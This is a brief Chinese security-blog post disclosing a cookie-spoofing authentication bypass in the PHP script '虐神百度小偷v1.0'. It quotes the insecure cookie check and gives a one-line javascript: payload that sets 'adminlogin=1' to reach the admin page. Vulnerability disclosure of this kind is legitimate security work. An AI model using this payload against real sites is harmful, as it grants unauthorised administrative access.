虐神百度小偷v1.0 cookie 欺骗

  • A+
所属分类:lcx

虐神百度小偷v1.0 cookie欺骗

本想发布歪酷CMS漏洞

怎么知道cond0r抢先发布了,为了版主他真的豁出去了! 在这里祝他成功!

此洞有点2... 毕竟是洞~ 让作者知道下也好.

if(isset($_COOKIE['adminlogin']) && $_COOKIE['adminlogin']=="1")//你懂的...
  Header("Location: main.php");
else
  Header("Location: login.php");
?>

javascript:alert(document.cookie="adminlogin="+escape("1"));

再浏览 127.0.0.1/admin/main.php

文章来源于lcx.cc:虐神百度小偷v1.0 cookie 欺骗

相关推荐: 使用批处理,Bat列出指定目录下存在的所有文件

使用批处理、Bat 列出指定目录下存在的所有文件: 列出F盘所有文件,并输出结果到a.txt。如果不想输出结果,则去掉命令中的“>a.txt”即可。 不包含目录、文件夹:dir /a-d /s /b f:>a.txt 包含目录及文件夹:dir /a…

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: